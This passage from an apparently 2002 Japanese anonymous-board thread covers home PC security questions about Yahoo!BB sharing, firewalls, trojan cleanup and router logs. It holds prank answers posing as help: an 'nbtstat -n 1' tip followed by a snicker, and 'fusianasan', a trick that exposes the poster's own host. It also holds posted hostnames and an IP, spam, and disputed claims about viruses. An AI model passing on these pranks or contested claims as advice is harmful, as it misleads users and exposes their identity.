危険サイトに行く場合には常に共有設定がオフのままになってるか注意して
ください。
放置ね
428423:02/12/12 22:54
>>426
レスありがとうございます。

ヤフーの人からっていうか、2chの人が何人か逮捕された事件があったと思うんですが、
要は、今もパスワードを比較的簡単にハッキングできる状態にあるのかどうか不安に思ってるんです。
パスワードがばれれば、登録されてる個人情報なんかも見られちゃうわけで、それが一番不安です。
どんなサイトも、個人情報入力する限り、絶対安全ということはないですが、
少なくともツールを使ってハッキングできるような状態だと、いやなんです。
自分で確かめるわけにもいかないので、識者の方からみてどうなんだろうと思い、質問した次第です。
アクリブ エックス
該当するページが見つかりませんでした

Acrive X
約183件/検索にかかった時間0.33秒
Active X
>>428
2chから逮捕者が出たのは、ユーザ名からパスを推測してアタックしたもの。
簡単なパスだったので、割り出されただけです。
パスワードは複雑なものしておくといいです。
あれはネカフェでキーロガーしかけてパスワード盗んだんじゃなかったっけ?
>>428
パスワード管理がしっかりしてなくて、推測されて起きた。
クッキー漏れとかは一切関係ない初歩的なミス。
要するにユーザー側に負があったと。
435423:02/12/12 23:15
>>431-434
レスありがとうございます。

そうだったんですか。安心しました。
今ヤフーでデッカイ懸賞やってるんで、ちゃんと住所書いて応募してみます。
ありがとうございました。
放置したいんだが笑いが止まらん。
>>426の藪書き込みは笑いのネタが満載なんてもんじゃない。
おまい俺を笑い死にさせる気ですか。
>>435=423
ついでにヤフーのアカウントにログインする時は
「標準」ではなく「セキュア(SSL)」モードで入るのをオススメしちゃう。
438名無しさん@お腹いっぱい。:02/12/13 00:30
ns1.ghostnet.ne.jp
210.248.99.178
439名無しさん@お腹いっぱい。:02/12/13 00:34
i031252.ap.plala.or.jp
>>428
以前2ちゃんねらの数人が逮捕されたとかいう件は、
Yahoo!オークションのIDとパスワードが漏れて、それを使ってヤフオクにログインした人達が不正アクセス
の嫌疑で取り調べを受けた、という事件ですね。
実際に逮捕されたんだったかどうだったかは記憶が定かじゃないですが。

上記の件はヤフオクのIDとパスワードが一緒だった、っていう初歩的なミスを突かれたもので、普通に
管理している分にはそう危険はないでしょう。

なおどっかの馬鹿が上記の件とYahoo!BBのセキュリティを混同してトンチンカンなことを言ってるよう
ですが無視してください。
>>440
>なおどっかの馬鹿が上記の件とYahoo!BBのセキュリティを混同して
>トンチンカンなことを言ってるようですが無視してください。


誰も混同なんかしてませんが。というか質問の意味がヤフーオークションの件を
意味してるとは思わなかっただけです。ヤフーBBとは関係ないですから。
尚、ヤフーオークションのID・パスワード流出・逮捕の件は>>432氏の御指摘の
とおりネットカフェでキーロガーをしこんで盗んだものですね。
442 :02/12/13 09:29
>>441
おはよう どっかの馬鹿
ヤフーBBのADSL回線でのセキュリティー上の最大の問題はヤフーの回線が
特殊で同じ局内の加入者がLANのようにつながってて共有の設定をしてると
覗かれるというのが有名です。
http://homepage2.nifty.com/ikakun/Linux/YBB.html
そこで、ヤフー側も必死で共有の設定が危険だと呼びかけてます。
http://yahoobb.tripod.co.jp/43.html
http://www.yahoo.co.jp/docs/ad/ybbmg/
そして共有設定を無効にする方法を解説しています。
http://tools.bb.yahoo.co.jp/setup/adsl/security/95.html
ヤフーBB加入者は共有設定をはずされる事を勧めます。
>>443
そんな必死にならなくてもいいよ(w
4452001年12月18日−不正にアクセスでネット詐欺、男性2人を逮捕 :02/12/13 09:56
>>423-443
http://auction.yahoo.co.jp/phtml/auc/jp/notice/instances08.html

2001年12月18日−不正にアクセスでネット詐欺、男性2人を逮捕
-------------------------------------------------------------
警視庁は、東京都世田谷区、無職男性(27)、東京都江戸川区、
無職男性(27)を詐欺などの疑いで逮捕した。 2人は2月、新宿区歌舞伎町の
漫画喫茶のパソコン約10台に、「キーロガー」(キーボードを押した順番を
記録するソフト)を勝手に組み込み、20人分のIDとパスワードを盗み、
これを使いネットオークションに不正にアクセスし、「ハイウェイカードを
安価で譲ります」と虚偽の掲示をして、17人から計約270万円をだまし取った
とみられている。
446名無しさん@お腹いっぱい。:02/12/13 09:59
粘着うざいぞ。
"薮パソユーザー ◆0fQkHdNop2"は荒らしなので、放置・スルーよろしくです。

セキュリティ板自治議論スレッド
http://pc.2ch.net/test/read.cgi/sec/1035466949/
>>443
Yahoo!BBの局側のDSLAMはずいぶん前からNetBIOSをフィルタリングしてます。
共有設定がどうであれ他人の共有ファイルを覗けたりできないんですがねえ。

ウソばっかり書いて初心者を混乱させるのはいい加減にしてくれませんか。
揚げ足取りの粘着の>>431 >>433-434も間違ってる罠。ワラ
450名無しさん@お腹いっぱい。:02/12/13 10:08
>>448
それじゃ、どうしてヤフーが共有設定を切るように呼びかけてるのかな〜?
粘着揚げ足取りもいい加減にしたら?
続きはこっちでやってくれないかな。

Yahoo BB の設定に注意(重大なセキュリティリスク)
http://pc.2ch.net/test/read.cgi/sec/1016583261/l50
>>446>>449>>450はヤブパー
453445:02/12/13 10:21
446を書いたのは漏れだが。
(;゚Д゚)
2ちゃんねらーヤフオクID不正使用タイーホの件なら、
http://www.google.co.jp/search?hl=ja&ie=UTF-8&oe=UTF-8&c2coff=1&q=morning1204+site%3A2ch.net&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja
を見れ。

キーロガーのヤツとは別件だよん。
>>451
そのスレではもう激しくガイシュツなので誰も相手にしません。
>>456 ここで蒸し返されても困るなぁ・・・
426の書き込みは質問に対する回答にまるでなっていないのに、自作自演じゃない
ならなんで「粘着止めろ」とか言って擁護するやつがいるのか理解不能。
( ´ー`)oO(おまいら、スルーだ、放置だ、透明あぼーんだぞ・・・。絶対に反応するな・・・)
458=459=ヴァカピーの自作自演
>>458
YBBについての必要事項の回答にはなってるよ。それで十分だろ。
はいはい、ご本人みずからのフォローご苦労様です
463名無しさん@お腹いっぱい。:02/12/13 17:22
ノートン製品版インストール(CDから)したいのですが、
「インストールする前にコンピューターを再起動して以前のアンインストールを完了する必要があります。
コンピューターを再起動してからインストーラを再び実行して下さい」
と出ます。
ノートン体験版を入れてあったのでアンインストールしました、再起動もしましたが何故か上記のコメントが出るんです。
何度も再起動してもこのコメントばっかなんです、どうしたらイイでしょうか?
465.:02/12/13 18:34

http://www.anizoku.net/library/etc/not.html
これには度肝を抜かれた
こんなこともできるんだな
>>465
その関連ページから凄いのみつけたよ

公明党ブラウザ
ttp://www.komei.or.jp/lounge/download.htm
467名無しさん@お腹いっぱい。:02/12/13 20:02
突然ですが、ゾーンアラームとノートンのファイアーウォールってどっちがセキュリティに関して強いのですか?
今はゾーンなんですが、思い切ってノートンでも買おうかなと思いたちましたが、
果たしてノートンはゾーンほどいっぱいブロックしてくれるのかが心配なのです。
また、ノートンもゾーンみたいに誰々からいつ攻撃受けたとか表示することはできるのでしょうか?

どなたか答えて下さい。お願いします。
>>467
winxpが一番に決まってるだろ
>>467
>ゾーンアラームとノートンのファイアーウォールってどっちがセキュリティに関して強いのですか?
>果たしてノートンはゾーンほどいっぱいブロックしてくれるのかが心配なのです。

どっちも性能的には変わりなし。

>また、ノートンもゾーンみたいに誰々からいつ攻撃受けたとか表示することはできるのでしょうか?

出来ますが、ポップアップは出ません。
>>467
純粋なファイヤーウォールとしてはゾーンアラームの方が優れてるという指摘
もあります。(もちろん、テストの仕方によっても違うでしょうけど)
http://www.geocities.jp/bruce_teller/security/leak.htm
しかし、自宅サーバーを立てない一般人で純粋なファイヤーウォール機能を
比べて意味があるのかどうか疑問です。
それよりノートン2003のファイヤーウォールは個人情報保護機能やIDSも
あり、総合的には無料版のゾーンアラームよりセキュリティーは優れています。
(ただし、ゾーンアラームも有料版にはそういう機能もあるかもしれません。)
また、ファイヤーウォールだったかアンチウィルスだったかどっちか
知りませんがweb閲覧時の有害コンテンツからの保護機能もあり、危険サイト
閲覧についてはノートンに軍配が上がるかもしれません。
ただ、ノートン2003は相当重いそうですし、色々と他のソフトやインターネット
利用において障害が起きたりするかもしれません。
障害について詳しくはノートンスレで聞いてください。
471名無しさん@お腹いっぱい。:02/12/13 21:53
自分の「NETBIOSの名前」を知りたいのですが、どうしたら調べる事が
出来るでしょうか。
何方か教えて下さい。
>>471

DOSプロンプトで
nbtstat -n 1
って入力して実行してみ。
最初は、ズラズラ文字スクロールするけど1分ぐらいで止まるから。
止まるまで待たないと、正確な値出てこないから気を付けて。
473472:02/12/13 23:06
ヒヒヒヒヒ
>>467
パーソナルユースで求められるPFWの機能としてなら469が言う通り
どちらも差は無い。ノートン(NIS、NPW)の場合PFWの機能以外にちょっとした
おまけ機能があるのだが、これは上手くつかいこなせないと初心者の場合
むしろ「なんじゃこりゃ」って事になる場合が多い。

>果たしてノートンはゾーンほどいっぱいブロックしてくれるのかが心配なのです。
繰り返しになるがおかしな設定にしないかぎりどちらも同じように「ブロック」する。
ただゾーンアラームは無害な流れ弾でも「ブロックした」と騒ぐだけ。
(最新Verなら騒がないように設定もできるが)
ゾーンアラーム以外の多くのPFWはそういうゴミは無言ではじいている。
ノートンはZAほど騒がないが、だからと言ってブロックしていな訳じゃない。

で、本題。今ZA使ってるなら金出してノートン買う事もないよ。
ノートンのおまけ機能が欲しい場合でも、他のフリーのソフトで充分以上の
ものを揃えられる。
>>474
あんた、説明上手だNE
476ななしさん:02/12/14 03:09
質問なんですけど、あるサイトの管理人をしているのですが一部有料でメンバーズエリアを設けているのですが
友人に「無料で見てやるよ」といわれて嘘だと思ったのですが、本当に見られてしまいました。
もちろんIDやパスワードは教えていません、1人1人IDとパスワードを変えているのにそんな事出来るんですか?
その場合どうすれば防げるのですか?
わー、たったそれだけの情報で解決策まで要求するかこの人。

>>476
JavaScriptのようなもので入場制限をしているならだれでも破れる。
サーバの機能を借りた.htaccessを利用するようなタイプだと普通破れない。
つーかその友人のアクセスした形跡を見て手段の見当もつかんのか。
案外CGIでIDとパスワードをすり合わせるだけの認証だったりして。
そして「ひみつのフォルダ」のURLに飛ばすだけ。ディレクトリと言わないあたり鬱。

てなわけで>>477も言っとるが
IDとパスワードをどう使ってどうメンバーズエリアになってるのかわからんと話にならん。
あとクイズでもやってるんでなければとっとと友人に聞け。
http://www.hellplant.org/cgi-bin/uploader/zenecro68xx/wc9316.png
昨日から↑のように数字の低いポートから何かされてるようなんですが
問題あるんでしょうか。

ルータはNEC BR1500H、Outpost FirewallとXP標準のファイアーオールを併用してます。
IP変えても同じなんです。
TREND MICROのオンラインスキャンは感染なしですた。
192.168.0.1・・・
>>479
ルータ
Σ( ̄▽ ̄;; ル...ルータの機能だったのか…
スレよごしすまそ。
483名無しさん@お腹いっぱい。:02/12/14 07:54
この板(セキュリティ板)には
まともに質問に答えられる人は皆無です
下記の板で訪ねたほうがよいでしょう

ネット初心者板
http://pc.2ch.net/hack/
484DR.ドス:02/12/14 08:43
>>482
ルータかな?
コトによると、攻撃かもしれないね
この画面だけでは何も断定できないが・・・
485463:02/12/14 18:17
>>464
教えて頂き有難うございます
なんとかインストできますた、2ちゃんがあってホントよかったです。
486名無しさん@お腹いっぱい。:02/12/14 23:37
前に誰かが、誰が書き込みしてるか暴いたという噂を聞いたのですが、
匿名掲示板なのに、そんなことできるんでしょうか?
ただの嘘ですかね?
>>486
fusianasan
>>486
無理。
489名無しさん@お腹いっぱい。:02/12/14 23:40

http://petitmomo.com/mm/

ここがちょっぴりエッチ系のめぐが運営している出会いサイトです。
もしよかったら使ってみて、、、
ヨロシクです。

めぐ(^o^)-☆
>>486
カキコの中にどんなサイトを運営しているとか言う情報が入っていれば
わかることもあるよ。
でも基本的には管理者しかわからない。
491名無しさん@お腹いっぱい。:02/12/15 05:23
おすすめのインターネットセキュリティーソフト教えて
493名無しさん@お腹いっぱい。:02/12/15 06:01
そういえばさっき書き込む時に 画面が 書き込んでいいですか?っていう画面が頻発したが

なぜだ?
494名無しさん@お腹いっぱい。:02/12/15 06:22
初心者でスマン
495b:02/12/15 06:27
496名無しさん@お腹いっぱい。:02/12/15 06:37
Backdoor.Trojanというトロイに感染してしまったのですが
ノートンで検疫したあと、誤って検疫ファイルごと消去してしまいました。
もうOSごと再インストールするしかないですか?
>>496
ここの駆除方法を見る限りでは検出ファイルは全て削除するとなってるね。
そんなやばいファイル消したん?
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.trojan.html
498496:02/12/15 07:44
>>497
おれもそこ見ました。
そうなんですよ・・・消しちゃったから関連してるファイルが一切わからなくて・・
499496:02/12/15 07:46
この辺を消しておけば確実っていうレジストリ値ってないですか?
一応バックアップは取りました
500496:02/12/15 07:49
\Runと\RunServicesを全て消して再起動したら再構築されるんでしょうか?
それが可能ならそうしたいと思います
>>498
全部消すのは止めとけ。
俺ノートン使いじゃないんだが、
ログに検出した結果は残って無い?
>>499
自分で見極められなければ晒してアドバイスを待つのもひとつの手かと。
あとOSの種類とノートンのVerを書いた方がいい。
503496:02/12/15 07:54
最近、定期的に広告(オンラインカジノっぽい)が開いてたんですが
今回のウィルスとも関係あるんでしょうか?
もうかれこれこの一連の問題で4時間余り苦悩しております・・・
504496:02/12/15 07:56
>>502
今から見てみます。

>>503
OSは98SEでノートンはv5.0です。
505名無しさん@お腹いっぱい。:02/12/15 07:58
ログにはテキストしか残ってなかったです。

ファイル
C:\My Documents\tool\haktek-j\haktek.exe
は Backdoor.Trojan ウィルスに感染しています。
このファイルは検疫されました。
506496:02/12/15 08:06
505もおれです。
今ふと思ってhaktek.exeで検索をかけてみたところ、
http://pc.2ch.net/sec/kako/1021/10211/1021137509.html
このスレの756に同じのに感染した人がいました。
761を見る限りでは大したウィルスじゃないようですが・・・
>>505
一応regeditでRun&RunServiceを覗いて
haktek.exeを参照するものが無いかチェックだ!
508496:02/12/15 08:14
被害も今のところ>>503に書いたようにポップアップの
広告が開いていただけなんですけど、やっぱり不安なんで
ノートンは定期的にかけることにして、もし次回また見つかったら
そのときは今度こそレジストリ削除をして完全に安心という形にしておこうと思います
509496:02/12/15 08:19
>>507
今確認してみました。無いようです。
少し前にも、もう一度ノートンかけたんですけどそのときも何も出ませんでした。
多分もう大丈夫そうです。ありがとうございました
>>496 >>509
念のため、電源を完全に切っといた方が良いですよ。
メモリに生き残ってたら復活する危険がありますから。
511名無しさん@お腹いっぱい。:02/12/15 09:15
ウィルスバスターにも引っかからなくて、疑問なんですが、
Thumbs.dbというデータベースファイルが作成されていて、
HPをアップするフォルダにいつも入っているんです。
削除は、FTPソフトで転送する時と、HDD検索して出てきたときで、
「隠しファイルを見る」で、見ようとしても見つからないんです。
ウィルスバスターに解析依頼を出しましたが、
ウィルスなし、の判定ですた。
なんか怖いんですけど、わかる人いますか?
(スレ違いだったらごめんご)
>>511
文章がわかりにくいですね。そのThumbs.dbファイルはどういう時に
見れて、どういう時に見れないのかわかりません。
それからFTPソフトが何かわかりません。(聞いてもFFFTP以外は
わかりませんけど)
もしかしたらFTPソフトかプロバイダーの関係で出てくるTemporary
ファイルの類ではないでしょうか?
心配なら無料版アンチドートでチェックされたらどうですか?
http://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html
まず、一番上のボタンを押して「コード解析」「圧縮ファイル」「メール
検索」にチェック入れてスキャンしてください。それから最初の
画面に戻って上から3番目のボタンでレジストリチェックしてください。
513ドキンちゃん:02/12/15 09:50
>>511
WindowsXPでは,画像が含まれるフォルダを開いたときに,
「Thumbs.db」という隠しファイルが作成される。
これはフォルダ内の画像を表示するときに利用される,
縮小画像のキャッシュだ。
ただし,隠しファイルを表示するように設定していると,
ホームページ用の画像を転送するときに,
間違えて一緒に転送してしまったりと,邪魔に思うこともあるだろう。
そのときは,キャッシュファイルが作成されないように設定してしまおう。

http://www.zdnet.co.jp/help/tips/windows/w0438.html
514 ?:02/12/15 10:42
2002/12/15 10:28:25 IP#2: rx filtered UDP from AAA/53 to 192.168.0.10/137
これはルータのLogなんですが、
AAAはプロバイダーのDNSサーバーIPアドレスです。
こちらのNetBIOSへ向けてアタックがイッパイあります。プロバやられてますか?
それとも踏み台にされてる? Tikitikiマンセ〜!なんだけど・・・
先日DNSサーバーを変更しろと案内されてからなんだけど。
515cheshire-cat ◆PhCATJR.v6 :02/12/15 11:06
>>514
出かける直前なんで手短に。
これではないんかい、と思いまする。試して味噌。
http://www.rtpro.yamaha.co.jp/RT/FAQ/Windows/NetBIOS-DNS.html
516cheshire-cat ◆PhCATJR.v6 :02/12/15 11:16
2000やXPなら、TCP/IPのプロパティ→詳細設定→WINSタブで、NetBIOS over TCP/IPを無効にしれば、何とかならないのかなぁ、ひょっとして。

報告希望。
517名無しさん@お腹いっぱい。:02/12/15 11:21
5 :J053224.ppp.dion.ne.jp :02/12/15 10:40 ID:Hl/DvHL1







http://freeweb2.kakiko.com/dengeki/indexs.htm
今日も荒らされてるね。質問者はhttp://pc.2ch.net/test/read.cgi/sec/1038273005/l50みて
自分で判断するように。

>>509 メモリに常駐するタイプのウイルスはMSDOSの頃はあったがWinでは仮想記憶が
使われているので、メモリイメージだけに寄生することはできなく、ファイルに寄生
する必要がある。でたらめ信じて他人に吹聴しないように。(電源切るのは当然害はないが)
>>511 >>513の言っていることが正しい。
>>512
ハズレ〜。ウィルスとは関係なし。
なんでもウィルスにしたがるんだな(w
>>519
そんなことはありませんよ、ただ、ANTIDOTEを薦めているだけでつ・・・
521名無しさん@お腹いっぱい。:02/12/15 13:03
昨日、友人からどうしてももらいたい.exeをメールにて送ってもらったのですが、
ノートンがメールチェックでウイルス反応を示しました。

検疫項目にその.exeにどうやらBackdoor.Torojanってのが含まれて検疫
修復されてましたが(http://securityresponse.symantec.com/region/jp/sarcj/data/b/backdoor.trojan.html
みると駆除方法にレジストリを参照して削除というのがあります。
一応、参照しましたが変なレジストリ情報はなかったです。
この.exe実行してませんが、実行しなければ感染してないということでしょうか?

522薮パソユーザー ◆0fQkHdNop2 :02/12/15 13:10
>>521

496の方ですか?そうでなかったら>>496-510を参考にしてください。
心配なら無料版アンチドートでチェックされたらどうですか?
http://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html
まず、一番上のボタンを押して「コード解析」「圧縮ファイル」「メール
検索」にチェック入れてスキャンしてください。それから最初の
画面に戻って上から3番目のボタンでレジストリチェックしてください。
>>521
実行してないなら気にスンナ

せっかくだからコレクションしとけ
524名無しさん@お腹いっぱい。:02/12/15 13:17
>>523
ありがとうございます。
>474
自分は>467とは反対なんですが、
今NIS2002使ってて、FW以外の機能は使ってません。
NAVだけにして、FWは簡素なフリーものにしようと思っていますが、
どうでしょうか?
>>520
ヒント:WinXPサムネイル画像

あとは検索かけて調べよう > 特に薮
527525:02/12/15 13:24
抜けてました。
ルーター使ってるし、ノートンのって、何かがちがちに固められてるような気がするんです。
あと、この部分だけ言えば、ZAはブロックした時に表示するのが良いと思うし、
Outpostはログが残るのが良いと思います。
(ノートンも残るけど、判別しにくそう)
528薮パソユーザー ◆0fQkHdNop2 :02/12/15 14:04
>>518

>メモリに常駐するタイプのウイルスはMSDOSの頃はあったがWinでは仮想記憶が
>使われているので、メモリイメージだけに寄生することはできなく、ファイルに
>寄生する必要がある。でたらめ信じて他人に吹聴しないように。


あなたはしつこくつきまとわれてますが、嘘を初心者に言いふらすのはいい加減
にしていただけませんか?精神異常ですか?
それとも基本的な事も全く知らないのですか?

たとえば Code red やチェルノブイリはメモリ常駐型です。
http://www.zdnet.co.jp/news/0107/31/e_codered_m2.html
>Code Redはメモリ常駐型,つまりハードディスクや他の固定ストレージ装置
>にではなく,サーバの揮発性物理メモリ上に棲息しているため,サーバを
>リブートするだけでも感染は消去できる。

http://inet.trendmicro.co.jp/virusinfo/isp/howto/howto_famous.asp
> PE_CIH( チェルノブイリ)
>「チェルノブイリ」の通称で有名なメモリ常駐型のファイル感染型ウイルス
>です。Windows 9x系のOSでのみ活動が可能で、32bit実行可能形式(PE形式)
>に感染します、特定の日付に起動されるとハードディスクやBIOSを破壊して
>しまう非常に悪質な破壊活動を行います。
529名無しさん@お腹いっぱい。:02/12/15 14:14
なるほど、ヤブ君の情報源はzdnetとかに代表される大衆向け情報なのか。
半端な知識をそうやって積み上げていって今にいたっているわけだ。

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=CODERED.A
そういうのはメモリ常駐型っていわないんだよ。
coderedはマシンのリブートすら必要ではない動いているIISを殺せば消え去る。
なんだ・・・、昨日で消えたかと思ったのに。
531ヲイヲイ:02/12/15 14:23
>>529

アンタの引用した所にもリブートで対処しろとなってるがな。

>対応方法:
>メモリ上のみで動作するプログラムであり、他のファイルへの感染活動は
>ありません。単純にマシンをリブートすればメモリがクリアされワームも
>なくなります。
532474:02/12/15 14:31
>>525
OSはなにかいな?
それとノートンのPFW機能で特に気に入ってる部分が何かありますか?
533名無しさん@お腹いっぱい。:02/12/15 14:33
フリーメールに関する質問なんですけど、hotmailのパスワードは、
破るためのソフトがあって簡単に破られると、どこかのスレで聞きました。
という事は、ヤフーのフリーメールのパスワードも破られるということで
しょうか?
2ちゃんにさらすためのフリーメールを探しているのですが・・・
皆さんが高度な質問をされているところ、初歩的な質問ですみません。
534名無しさん@お腹いっぱい。:02/12/15 14:35
>>533
おまえ、今の状態を狙って聞いてるだろ?
首釣って死ね
535526:02/12/15 14:40
あ、>>513に書いてあった。
ハズカシ〜&hears;
536名無しさん@お腹いっぱい。:02/12/15 14:43
(・∀・)ニヤニヤ
537ドキンちゃん:02/12/15 14:59
>>533
あほなパスワードでなければ、ヤフーで十分だよ。
そうでなかったら、ヤフオクでのパス破り事件が日常茶飯事になってしまう。
例の2ちゃんねらー逮捕事件はパスがあほだったからだね。
538525:02/12/15 15:46
>532
OSはXPとWin98です。
ノートンのPFWで気に入っている部分って、特にないんです。
これが良いと聞いて2001を買い、XPで使えないって言うんで2002にしました。
539名無しさん@お腹いっぱい。:02/12/15 16:02
1ヶ月で4万回とかブロックするのって普通なの?
ZoneAlarmなんですが
>>539
特に問題なし。
541名無しさん@お腹いっぱい。:02/12/15 16:11
>>540
そうですか。ありがとう。
542名無しさん@お腹いっぱい。:02/12/15 17:00
少しお伺いしたいのですが、WINDOWSの接続の所にダイヤルアップの見たことの無いIDとやたら長い数字が羅列していました。
ADSLとダイヤルアップの接続が両方とも繋がっている場合どっちで繋がるのですか?
わかる方教えてください。宜しくお願い致します。
543名無しさん@お腹いっぱい。:02/12/15 17:12
すみません。ここに質問したらいいのか良く分からない
のですが、添付ファイルのついていないメールが、ウィルス
メールである事ってあるんでしょうか?
変な質問でごめんなさい。是非、教えて下さい。
544474:02/12/15 17:18
>>538
そうですか。NISで充分とも思いますがフリーのPFWもそれぞれ持ち味が
あるので変えてみるのも良し。ではこの板で人気のフリーの4大PFWについて特徴を。

ZoneAlarm → 簡単、且つ堅い。重い(リソース消費大)。完全アンインストールが大変。
Outpost → まぁ簡単、軽い。多機能(おまけ機能がノートン並)
Sygate5 → 柔軟。重くはない。ログ充実。IDS機能有り。GUIかっこいい。
Kerio2.1.4 → とにかく軽い。設定次第で堅くも穴だらけにもなる。知識(慣れ)必要。

Outpostは日本語対応、それ以外も日本語化パッチが全てあり。
OSが98ならばZA以外のものを選ぼう。(NISより)軽くなった事が実感できる。
XPならリソースは気にしなくて良いからどれでもお好きなのを。

以下は私見。「とりあえず簡単なものを」というならZAがベスト。
でも525さんの文面から向上心のある方と勝手に推測、SygateかKerioに
チャレンジしてみてはどうでしょう?確かに知識が無いと初めは訳がわからない
だろうけど、なんとか使いこなそうとする過程で、セキュリティ確保に一番大事な
「知識」が身に付きます。慣れるとPFWのルール作りも楽しくなる、かな。

どれを選んでもユーザーインターフェースはノートンよりは良いので
変えてみて失敗、という事は無いと思う。
>>542
文章の意味が不明。もっと分かりやすく書いてくれ。

>>543
可能性としてはかなり低い。
546 :02/12/15 17:22
連打でアンチスレをとめたいのですが
良い方法があったら教えてください。
よろしくお願いします


547名無しさん@お腹いっぱい。:02/12/15 17:25
>>545
ありがとうございました!!安心しました。
>>542
うー。
ADSL接続可能でなおかつ「普通の」56kモデムも回線に繋がってると解釈。
どっちも繋がる。
Windows標準と設定されているほうで普段は繋がるが、
「他の接続」が設定されていて機器(モデム)が適切に設定されてれば
その「他の接続」は有効。
たとえばQ2プロバイダ接続でギコギコ電話かけるやつはパソコンに電話線繋がってれば使用可能。

>>547
安心すんな。他人に聞かずウィルスチェッカに聞け。
見た目で判断できるほどの技量はないと見た。
>>547
TXT表示オンリーなら心配ない
550薮パソユーザー ◆0fQkHdNop2 :02/12/15 18:17
>>542

>ADSLとダイヤルアップの接続が両方とも繋がっている場合
>どっちで繋がるのですか?


私はADSLとダイヤルアップの両方のプロバイダーがあり、両方の回線を
つなげてますが同時には使用できません。
同時に両方使えるとブラウザーが困るからでしょう。
「ダイヤルしない」「ネットワーク接続が存在しないときには、ダイヤル
する」「通常の接続でダイヤルする」の3つから選ばねばなりません。

>>543
添付ファイルがなければ厳密にはウィルスメールではないですが、回線が
つながっていればHTMLメールの場合にはウィルスの埋め込まれたHPに
飛ばされてセキュリティーホールを塞いでなければウィルスに感染する
場合もあります。
551名無しさん@お腹いっぱい。:02/12/15 18:31
今までFWソフトのみで繋いでいてセキュリティチェックサイトでは
全部Stealth!だったんですが、これにルーターを加えたらStealth!
が4個に減ってしまいました。気にしないでも良いでつか?
>>551
手段と目的が入れ替わった人ハケーン
>>551
何のポートがStealthじゃなくなったのか分からないので、判断できません。
>>551
気にしなくて良いでしょう。
ルーターがcloseと反応してるだけですから。
>>551
とりあえず、ステルスでは無くなったポートは何?
556542:02/12/15 18:52
皆さん、色々とご教授有り難うございます。
545様、文章がわかりにくくて申し訳ありませんでした。
ADSLでの契約のはずが何故かダイヤルアップ接続のショートカットが増えていたのです。ダイヤルアップの接続先は海外の電話番号か何かでここに接続すれば国際電話料金の請求が来るのかと思うと怖くて・・・。
とりあえずダイヤルアップ接続は削除しときます。
>>551
大いに気にしてくれ。
ルータの設定がおかしいか安物かのどちらかですから。
>>556
もし請求が来たら国際電話の料金だけはQ2と違って払わなくてはいけないので、それだけは覚悟。
ADSLだけ使うのなら、56kモデムの回線を外しておくべき。
ADSL接続から国際電話に繋がることは無い。
559551:02/12/15 19:06
StealthからClosedに降格したポートは
21,25,79,110,113,135,143,443,445です。ルータは
NECのWB45RLです。ルーターなしのほうがセキュ面で
安全度が高いのでしょうか?
>>559
ステルスモードのあるルーターは高いし、ブロードバンド回線ではあまり意味が
ありません。(そのIPにユーザーがいる可能性が高いとわかってるから)
ルーターが応答してもclosedなら問題ないでしょう。
つまり、ステルスな内堀(パソコン内部のパーソナルファイヤーウォール)に
加えて、橋のある位置はわかってるけど防御できてる外堀(ルーター)が
追加されたのですから安全性はアップしてます。
>>559
なんか見えてるポート多すぎるよ。普通のルータなら、基本的にはステルスのはず。
設定で「pingに応答をする」とかにチェック入ってない?
>>556
どうしてもダイヤルアップもつけとくなら国際電話・Q2防止ソフトを
常駐させたらどうですか?(私は入れてないですけど)
http://www.emurasoft.com/jp/chintcal/index.php
それから、全く知らないとかだまされてダイヤルされたのであれば犯罪
なので警察とかに行ってください。(カッコ悪いでしょうけど)
ただし、英語ででも意味がわからずOKしてたら支払い義務はあると
思います。

>>558

>ADSLだけ使うのなら、56kモデムの回線を外しておくべき。

セキュリティーを考えればそうすべきなのですけど、頻繁にADSLが
切れてつながらない場合にはダイヤルアップ回線もつなげてしまう
者もいるでしょう。(たとえば私みたいに)
↑質問の意味をまるで理解してない
564名無しさん@お腹いっぱい。:02/12/15 19:34
>>562 薮パソはキチガイだから。何も知らないくせに。
ファイアウォールをソフトの名前と思ってるやつと
同レベルだよ、きっと。ってゆうか絶対
>>531
coderedをメモリ常駐型と呼んでない事を示すために引用したんだよ。
>薮パソユーザー ◆0fQkHdNop2 氏

回答者のマナーとして
他人が回答している話に余計なレスをつけない。
他人の回答にケチをつけない。
質問と関係のない自分の都合を持ち出さない。

この位は守ること。
>>566
ヤブじゃないが
そんな事いってるとヤブのでたらめを叩けなくなる。
でたらめな回答は叩くべし。
>>566
ヤブじゃないが
そんな事いってるとヤブのでたらめを叩けなくなる。
でたらめな回答は叩くべし。
569名無しさん@お腹いっぱい。:02/12/15 20:15
VBS_REDLOF.Aというウィルスに感染したようです。
いちおうオンラインスキャンで削除できるファイルは削除しておきました。

これに感染すると、htmlファイルにも確実にウィルスが埋め込まれてしまうのでしょうか?
見た限りでは、それらしいものはなかったのですが…
>>569
強力なウィルス検出力のある無料版アンチドートでチェックされたらどうですか?
http://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html
まず、一番上のボタンを押して「コード解析」「圧縮ファイル」「メール検索」に
チェック入れてスキャンしてください。それから最初の画面に戻って上から
3番目のボタンでレジストリチェックしてください。
571名無しさん@お腹いっぱい。:02/12/15 22:01
最近ノートン先生がこの手の警告を頻繁に出すようになりました。
高危険度となっているので遮断してますが、これってなんなんですか?
不安でたまりません。

21:40(2002/12/15)に次の通信を検出しました:
プロトコル:TCP(インバウンド)
リモートアドレス:61.74.223.25 :5000
ローカルアドレス: 自分のホスト:
ms-sql-s(1433)
リモートコンピュータがこのコンピュータとの接続を確立しようとしていま
す。
572名無しさん@お腹いっぱい。:02/12/15 22:01
最近ノートン先生がこの手の警告を頻繁に出すようになりました。
高危険度となっているので遮断してますが、これってなんなんですか?
不安でたまりません。

21:40(2002/12/15)に次の通信を検出しました:
プロトコル:TCP(インバウンド)
リモートアドレス:61.74.223.25 :5000
ローカルアドレス: 自分のホスト:
ms-sql-s(1433)
リモートコンピュータがこのコンピュータとの接続を確立しようとしていま
す。
573b:02/12/15 22:05
>>571-572
Port1433は"Microsoft SQL Server"
SQL Serverってのを使ってなければ、ほぼどうでもいいと思われ
ABoneをバージョンうpしる!
話はそれからだ
576名無しさん@お腹いっぱい。:02/12/15 22:20
>>574
ありがとう
>>575
そういえば、バージョンアップ最近してなかった。
なんでわかるの?
>>576
二重カキコ=ABone ってことだろう・・・
578名無しさん@お腹いっぱい。:02/12/15 22:28
